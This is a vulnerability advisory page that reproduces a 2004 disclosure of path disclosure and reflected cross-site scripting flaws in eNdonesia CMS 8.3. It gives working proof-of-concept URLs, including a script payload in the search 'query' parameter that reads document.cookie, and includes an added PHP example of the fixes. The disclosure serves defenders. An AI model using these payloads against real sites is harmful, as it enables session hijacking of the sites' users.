SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Forum/Board/Portal)  >   eNdonesia Vendors:   endonesia.com
eNdonesia 'mod.php' Input Validation Vulnerability in Search 'query' Parameter Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1010864
SecurityTracker URL:  http://securitytracker.com/id/1010864
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 4 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 8.3
Description:   Some vulnerabilities were reported in eNdonesia. A remote user can conduct cross-site scripting attacks. A remote user can determine the installation path.

y3dips reported that the software does not properly filter HTML code from user-supplied input in the "query" parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the eNdonesia portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://localhost/endon/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E

It is also reported that a remote user can submit a request with certain invalid parameters to cause the system to display the installation path.

Some demonstration exploit URLs are provided:

http://localhost/endon/mod.php?mod=1

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=%3Cb%3Etest%3C/b%3

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your character]

The original advisory is available at:

http://echo.or.id/adv/adv02-y3dips-2004.txt

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the eNdonesia portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  sourceforge.net/projects/endonesia (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple vulnerabilities in eNdonesia CMS




ECHO_ADV_02$2004

---------------------------------------------------------------------------
               Multiple vulnerabilities in eNdonesia CMS
---------------------------------------------------------------------------

Author: y3dips
Date: August 2nd, 2004
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv02-y3dips-2004.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eNdonesia is a freeware content management system, written in PHP by Nurcholis.

Homepage: http://www.endonesia.net/

Download at: http://www.sourceforge.net/projects/endonesia

Version:
Tested on eNdonesia 8.3.
Not tested on other/older versions, but it is possible that they are the same.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1. - all scripts in "mod.php" files are not protected against direct access

Example:

http://localhost/endon/mod.php?mod=1

... and we will see standard PHP error messages, revealing the full path to the script:

Warning: main(./mod/1/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3

Warning: main(): Failed opening './mod/1/index.php' for inclusion \
(include_path='.:/usr/share/pear') in /var/www/html/endon/mod.php on line 3

A2. 

Example:

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=%3Cb%3Etest%3C/b%3

... and we will see standard MySQL error messages, revealing the full path to the script
in the module, because of the input character:

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your character]

Warning:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource 
in /var/www/html/endon/mod/publisher/publisher.php on line 101



B. Cross-site scripting aka XSS:

eNdonesia has built-in filtering against XSS exploits, so additional measures must be used
for successful cross-site scripting.

B1 - XSS through unsanitized user-submitted variable in mod.php

 http://localhost/endon/mod.php?mod=[XSS Code here]publisher&op=viewcat&cid=1

POC: http://localhost/endon/mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat&cid=dudul

Then the warning is:

Warning: main(./mod/

test

Epublisher/index.php): failed to open stream: \
No such file or directory in /var/www/html/endon/mod.php on line 3 .

... with "test" in <h1> format.

B2. Session ID at search box

http://localhost/endon/mod.php?mod=publisher&op=search&query=

POC:

http://localhost/endon/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E

or in the search box, input <script>alert(document.cookie)</script>
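The two root causes above (the `mod` value being spliced straight into an include path, and the `query` value being reflected unescaped) both come down to trusting request parameters. The following is an added example of a hardened front controller, written for this page and not taken from eNdonesia; the module allowlist, the `mod/` layout and the search echo are assumptions made for illustration.

```php
<?php
// Added example, not eNdonesia's own code. It shows the defensive pattern for
// both issues reported above: module names come from an allowlist instead of
// being spliced into an include path (A1/B1), numeric ids are validated before
// reaching SQL (A2), and anything reflected into the page is HTML-escaped (B2).
// The module list and the "mod/<name>/index.php" layout are assumptions.

declare(strict_types=1);

// Never show PHP warnings (and the file paths inside them) to visitors;
// log them server-side instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Allowlist of installed modules: a request can only select one of these,
// so "mod=1" or "mod=<h1>test" never reaches include() at all.
const ALLOWED_MODULES = ['publisher' => true, 'search' => true];

/** Return the module name to load, or null for anything not allowlisted. */
function resolve_module(string $requested): ?string
{
    return isset(ALLOWED_MODULES[$requested]) ? $requested : null;
}

/** Escape a user-supplied string for safe placement inside HTML text. */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$mod = resolve_module((string) ($_GET['mod'] ?? ''));
if ($mod === null) {
    http_response_code(404);
    exit('Unknown module.');            // generic message, no path information
}

// A category id must be an integer before it is used in a query, so a value
// like "<b>test</b>" is rejected here instead of producing a failed query
// whose warning reveals publisher.php's location.
$cid = filter_var($_GET['cid'] ?? '', FILTER_VALIDATE_INT);
if ($cid === false) {
    $cid = null;                        // treat as "no category selected"
}

// Reflecting the search term is fine once it is escaped:
// <script>alert(document.cookie)</script> is rendered as inert text.
$query = (string) ($_GET['query'] ?? '');
echo '<p>Results for: ' . html_escape($query) . '</p>';

// $mod is guaranteed to be one of the allowlisted names, so the path is fixed.
require __DIR__ . '/mod/' . $mod . '/index.php';
```

Turning `display_errors` off only hides the path leak; the allowlist and the integer check are what remove the underlying failure modes.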

---------------------------------------------------------------------------
The fix:
~~~~~~~~
Vendor not contacted yet, but I'll post it to them later.

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to)
~ newbie_hacker@yahoogroups.com , 
~ #e-c-h-o@DALNET

---------------------------------------------------------------------------
Contact:
~~~~~~~~

     y3dips || echo|staff || y3dips[at]phreaker[dot]net
     Homepage: http://y3dips.echo.or.id/

------------------------------[ EOF ]--------------------------------------

Copyright 2020, SecurityGlobal.net LLC